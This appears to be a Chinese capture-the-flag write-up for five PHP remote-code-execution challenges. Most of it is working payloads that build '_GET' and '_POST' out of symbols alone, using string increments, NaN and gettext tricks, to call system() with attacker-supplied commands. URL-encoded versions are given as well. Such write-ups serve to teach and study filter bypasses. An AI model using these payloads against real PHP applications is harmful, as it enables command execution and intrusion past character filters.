前言
当时做的时候就做了两题就溜了,现在回头看一下学到了不少知识。
RCE挑战1
只过滤了括号,没有过滤反引号。
code=echo `cat /f1agaaa`;
RCE挑战2
自增绕过,不过在构造 A
字母时不能用双引号了,可以用单引号连接,形成字符串,并获取字母 A
。
并且版本是 php7
,也就不能动态调用 eval
和 assert
了。
<?php
$_=[];
$_ = ''.$_;
$_=$_['!'==';'];
$_++;$_++;
$_++;$_++;//E
$__=$_;
$_++;
$_++;//G
$__=$_.$__;
$_++;$_++;$_++;$_++;$_++;
$_++;$_++;
$_++;$_++;$_++;$_++;
$_++;
$_++;//T
$__='_'.$__.$_;
($$__['_'])($$__['__']);//($_GET['_'])($_GET['__'])
payload:
?_=system&__=cat /f1agaaa
ctf_show=%24_%3D%5B%5D%3B%24_%20%3D%20''.%24_%3B%24_%3D%24_%5B'!'%3D%3D'%3B'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D'_'.%24__.%24_%3B(%24%24__%5B'_'%5D)(%24%24__%5B'__'%5D)%3B
以下参考:
https://blog.csdn.net/m0_64815693/article/details/127951989
下面几题我就直接搬运 payload
不解释了,有兴趣的可以去上面的链接里研究,讲的很详细。
RCE挑战3
可用:
$ ( ) + , . / 0 1 ; = [ ] _
<?php
$_=([].[])[0];
//这里就是上面的数组拼接,强制返回ArrayArray, 取第一个A
$_=($_/$_.$_)[0];
//这里是关键php的计算上面有说,其实这里麻烦了,只是当时不知道, 这里返回 N
$_++; //O
$__=$_.$_++;
//这里是进行了++的,所以$_等于P, $__=PO, 其实这里才是第五题的关键嘿嘿,很多74的就是卡在这
$_++; // Q
$_++; // R
$_++; // S
$_=_.$__.$_.++$_; //这里最后一个也是进行了++的,所以最后一位是T, $_ = _POST
$$_[_]($$_[1]); // $_POST[_]($_POST[1]);
payload:
$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);
//执行这一串就可以了
ctf_show=%24_%3D%28%5B%5D.%5B%5D%29%5B0%5D%3B%24_%3D%28%24_/%24_.%24_%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B1%5D%29%3B&_=system&1=ls
RCE挑战4
可用:
$ ( ) + , . / 0 ; = [ ] _
<?php
$_=((0/0).[])[0];
//这里是关键php的计算上面有说,其实这里麻烦了,只是当时不知道, 这里返回 N
$_++; //O
$__=$_.$_++; // $__=PO, 其实这里才是第五题的关键嘿嘿,很多74的就是卡在这
$_++; // Q
$_++; // R
$_++; // S
$$_[_]($$_[0]); // $_POST[_]($_POST[0]);
$_=((0/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[0]);
//这样提交就可以了
ctf_show=%24_%3D%28%280/0%29.%5B%5D%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B0%5D%29%3B&_=system&0=ls
RCE挑战5
可用:
$ ( ) + , . / ; = [ ] _
这边主要是两个地方,一个是字符串链接和自增的执行的顺序,另一个是 gettext
扩展(支持 _()
)
官方:
<?php
$_=_(_/_)[_];//相当于gettext(0/0)[0],得到N
$_=++$_;//O
$%FA=_.++$_.$_;//_PO
$_++;$_++;//R
$%FA.=++$_.++$_;//_POST
$$_[_]($$_[%FA]);//$_POST[a]($_POST[_])
练习两年半的篮球选手:
<?php
$_=(_/_._)[_];
$_++;
$%FA=$_.$_++; //这里为PO
$_++;$_++;
$_=_.$%FA.++$_.++$_;
$$_[_]($$_[%FA]);
佚名大佬:
<?PHP
$_=_(_._)[_];//N //本地使用就用(_._._)[_]
$%FA=++$_;//O
$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);
//将拼接放到同一行,真的太厉害了,我只能感叹一句nb